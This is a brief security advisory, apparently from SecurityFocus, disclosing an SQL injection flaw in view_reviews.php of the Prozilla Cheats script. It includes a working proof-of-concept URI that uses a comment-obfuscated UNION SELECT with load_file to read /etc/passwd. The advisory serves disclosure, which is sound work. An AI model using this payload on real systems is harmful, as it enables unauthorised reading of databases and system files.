Prozilla Cheats SQL Injection Vulnerability

An attacker can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/view_reviews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,load_file('/etc/passwd'),4,5,6,7,8,9/*


 

Privacy Statement
Copyright 2010, SecurityFocus